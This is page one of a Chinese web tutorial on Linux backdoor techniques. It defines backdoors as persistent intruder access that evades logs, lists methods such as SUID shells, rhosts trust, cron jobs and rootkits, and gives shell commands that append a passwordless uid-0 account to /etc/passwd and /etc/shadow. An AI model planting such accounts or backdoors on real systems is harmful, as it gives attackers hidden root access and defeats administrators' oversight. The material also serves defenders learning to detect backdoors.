Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / 网络安全高级技巧 Linux后门技术与实践

后门简介 入侵者完全控制系统后,为方便下次进入而采用的一种技术。一般通过修改系统配置文件和安装第三方后门工具来实现。 具有隐蔽性,能绕开系统日志,不易被系统管理员发现等特点。 常用后门技术 增加超级用户账号 破解/嗅探用户密码 放置SUID Shell rhosts + + 利用系统服务程序 TCP/UDP/ICMP Shell Crontab定时任务 共享库文件 工具包rootkit 可装载内核模块(LKM) 增加超级用户
# echo "e4gle:x:0:0::/:/bin/sh" >> /etc/passwd # echo "e4gle::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow
如果系统不允许uid=0的用户远程登录,还需要增加一个普通用户账号。
  • 1
  • 2
  • 3
  • 4
  • 5
  • 下一页
【内容导航】
第1页:后门简介、常用技术第2页:破解/嗅探用户密码
第3页:后门的检测 第4页:利用后门登录
第5页:最后的修饰
Vista的安全性比XP并没有多少改变[黑客木马编程教程]微型PHP木马解析相关资讯      Linux  安全 
  • Linux 即将 25 岁:足够伟大 却不  (01月01日)
  • Linux 这么棒是因为开源?  (08/28/2015 09:21:02)
  • FreeBSD 和 Linux 有什么不同?  (07/31/2015 09:15:06)
  • 盘点全球“国家级” Linux 项目  (09/25/2015 06:11:28)
  • 庆祝 Linux 24 岁生日!  (08/26/2015 06:13:36)
  • 【观点】离了Linux,我就活不了!  (10/31/2013 19:39:56)
本文评论 查看全部评论 (1)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经阅读并接受上述条款